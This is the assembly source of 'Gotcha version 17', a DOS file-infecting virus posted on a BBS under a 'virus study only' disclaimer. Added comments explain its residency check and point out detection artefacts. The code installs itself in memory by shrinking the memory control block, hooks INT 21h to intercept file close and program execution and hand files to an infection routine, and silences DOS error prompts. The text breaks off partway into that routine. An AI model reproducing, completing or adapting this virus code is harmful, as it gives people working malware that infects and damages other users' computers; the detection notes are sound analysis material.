;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;****************************************************************************
;* Gotcha version 17
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
; Assembler set-up and symbolic constants.
; .RADIX 16 makes every unsuffixed numeric literal in this file hexadecimal;
; the values written with a `d` suffix below are meant as decimal.
.RADIX 16
cseg segment
assume cs:cseg,ds:cseg,es:nothing
VERSION equ 17d ;version number; returned in AL by the AX=DADA residency check (see do_DADA)
FILELEN equ end - start ;byte length of the body from `start` to `end` (`end` is defined outside this excerpt)
RESPAR equ (FILELEN/16d) + 18d ;paragraph count (16-byte units) subtracted from the host's memory block at install time
BUFLEN equ 18 ;size of `buffer` in bytes (18h = 24 decimal)
ENVLEN equ signature- envstring ;distance between two labels that are defined outside this excerpt
COMSIGN equ 0 ;value of `comexe` that selects the COM return path (entryC)
EXESIGN equ 1 ;presumably the `comexe` value for an EXE host; not referenced in this excerpt
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
; Three-byte stand-in for an infected COM host: the first instruction of the
; file is a near jump into the appended code.
org 0100 ;COM images start at offset 100h, directly after the PSP
begin: db 0E9, BUFLEN+1, 0 ;bytes E9 19 00 = jmp near, skipping buffer (BUFLEN bytes) and comexe (1 byte) to reach `call start2`
;****************************************************************************
;* Data
;****************************************************************************
; Data area at the front of the body. `start` is the reference point that the
; entry code recovers at run time (si = start after the call/pop sequence).
org 0103
start:
buffer db 0CDh, 20 ;saved original host bytes; in this carrier they are CD 20 = int 20h (terminate program)
db (BUFLEN-2) dup (?) ;rest of the BUFLEN-byte save area, uninitialised here
comexe db COMSIGN ;host-type flag read at cs:[si+BUFLEN]; COMSIGN here because the dummy host is a COM program
;****************************************************************************
;* Install the virus
;****************************************************************************
; Entry code, reached through the jump at `begin`. In order, it:
;   1. finds its own run-time offset with call/pop,
;   2. pushes the host's original entry address as a far return address
;      (for a COM host it also restores the first three bytes at 0100),
;   3. asks INT 21h AX=DADA whether a copy is already resident,
;   4. requires DOS 3.10 or later,
;   5. shrinks the host's memory block (only if it is the last one in the
;      chain), copies FILELEN bytes into the freed area and points the
;      INT 21h vector at ni21 in that copy,
;   6. returns to the host with retf.
; Artefacts an analyst can look for: INT 21h AX=DADA answered with AH=A5;
; the last MCB size and the PSP top-of-memory word both lowered by
; `low RESPAR` paragraphs; the INT 21h vector pointing into that area.
call start2 ;pushes the offset of start2 so the code can locate itself
start2: pop si ;si = run-time offset of start2
sub si,(BUFLEN+4) ;si = run-time offset of `start` (buffer + comexe byte + 3-byte call)
mov di,0100 ;di = COM entry offset; also the destination offset of the copies below
cld ;string instructions count upwards
cmp byte ptr cs:[si+BUFLEN],COMSIGN ;read the comexe flag stored after buffer
jz entryC
; Non-COM path: build the return address from two words saved in buffer.
entryE: mov ax,ds ;ds = PSP segment at program entry (DOS convention)
add ax,10 ;+10h paragraphs = first segment after the 100h-byte PSP
add ax,cs:[si+16] ;add the word at buffer+16h (matches the initial-CS field of an EXE header; how buffer is filled is not shown here)
push ax ;push new CS on stack
push cs:[si+14] ;push new IP on stack (word at buffer+14h)
jmp short entcheck
; COM path: return address is cs:0100, and the saved bytes go back there.
entryC: push cs ;push new CS on stack
push di ;push new IP on stack (0100)
push di ;keep di and si across the string moves
push si
movsw ;copy 3 bytes from ds:si (buffer) to es:di (0100): the host's original start
movsb
pop si ;si = start again
pop di ;di = 0100 again
entcheck: mov ax,0DADA ;residency probe; a resident copy answers in do_DADA
int 21
cmp ah,0A5 ;AH=A5 means already resident
je entstop
mov ax,3000 ;AH=30h get DOS version (AL=major, AH=minor)
int 21
xchg ah,al ;ax = major:minor
cmp ax,030A ;require version 3.10 or later
jb entstop
push ds
push es
mov ax,ds ;ds-1 = memory control block (MCB) of this program
dec ax
mov ds,ax
cmp byte ptr ds:[0000],5A ;MCB type 5Ah ('Z') = last block in the chain
jnz cancel ;not the last block: leave memory untouched
mov ax,ds:[0003] ;MCB size field, in paragraphs
sub ax,low RESPAR ;low byte of RESPAR is used as the paragraph count
jb cancel ;block too small
mov ds:[0003],ax ;write back the reduced size
sub word ptr ds:[0012],low RESPAR ;ds is PSP-1, so offset 12h is PSP:0002, the top-of-memory segment
mov es,ds:[0012] ;es = lowered top of memory = segment of the freed area
push cs
pop ds ;ds:si = start of the running copy
mov cx,FILELEN
rep movsb ;copy the body to es:0100; `start` assembles at 0103, so resident offsets are 3 lower (hence the -3 below)
mov ds,cx ;cx is 0 after rep, so ds = 0000 (interrupt vector table)
mov si,4*21 ;offset of the INT 21h vector (4 bytes per entry)
movsw ;append the old vector right after the copied body
movsw
push es ;ds = segment of the resident copy
pop ds
mov dx,offset ni21-3 ;resident offset of ni21 (see the note on rep movsb)
mov ax,2521 ;AH=25h set interrupt vector, AL=21h
int 21
cancel: pop es
pop ds
entstop: db 0CBh ;retf: far return to the CS:IP pushed above, i.e. the host's entry point
;****************************************************************************
;* Interrupt 24 handler
;****************************************************************************
; Critical-error (INT 24h) handler that always answers AL=3, which DOS
; treats as "fail the call", so no Abort/Retry/Fail prompt is shown.
; The code that installs this handler is not part of this excerpt.
ni24: mov al,3
iret
;****************************************************************************
;* Interrupt 21 handler
;****************************************************************************
; Resident INT 21h hook. Three cases:
;   AX=DADA        -> answer the residency probe with AX=A500+VERSION and return.
;   AH=3E (close)  -> duplicate the handle in BX, hand the copy to `infect`.
;   AX=4B00 (exec) -> open the file named at DS:DX, hand the handle to `infect`.
; Every other call, and both cases above once `infect` returns, continues in
; the original INT 21h handler with all registers and flags restored.
; For detection: the AX=DADA / AH=A5 exchange is a fixed residency marker.
ni21: pushf ;keep the caller's flags; restored by popf on both exits
cmp ax,0DADA ;install-check ?
je do_DADA
push dx ;save every register the hook or `infect` may change
push cx
push bx
push ax
push si
push di
push ds
push es
cmp ah,3E ;close ?
jne vvv
mov ah,45 ;AH=45h duplicate handle in BX, so the caller's own close still works
jmp short doit
vvv: cmp ax,4B00 ;execute ?
jne exit
mov ah,3Dh ;AH=3Dh open; AL is still 00 (read-only), DS:DX = path from the exec call
doit: int 21 ;re-enters this hook; AH is now 45 or 3D, so the nested call falls through to exit and reaches the original handler
jc exit ;dup/open failed: do nothing
xchg ax,bx ;bx = new handle for `infect`
call infect
exit: pop es ;restore registers in reverse push order
pop ds
pop di
pop si
pop ax
pop bx
pop cx
pop dx
popf
org21: jmp dword ptr cs:[oi21-3] ;chain to the saved original vector; -3 because the resident copy sits 3 bytes lower than assembled
do_DADA: mov ax,0A500+VERSION ;AH=A5 signature, AL=version number
popf ;balance the pushf at ni21
iret ;return straight to the caller; the original handler is not called
;****************************************************************************
;* Close the file
;****************************************************************************
; Issue DOS "close handle" (AH=3Eh) through the original INT 21h handler,
; bypassing the ni21 hook. pushf / push cs / near call leave flags, CS and IP
; on the stack, the same frame an `int` would build, so the old handler's
; iret comes back to the `ret` below.
; The handle is expected in BX (DOS convention); the callers are not shown here.
close: mov ah,3E ;close the file
pushf
push cs
call org21 ;org21 jumps to the saved original vector
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
push bx
mov ah,62 ;get segment-adres of PSP
int 21
mov ds,bx ;get seg-adres of environment
mov es,ds:[002C]
xor di,di
pop bx
push cs
pop ds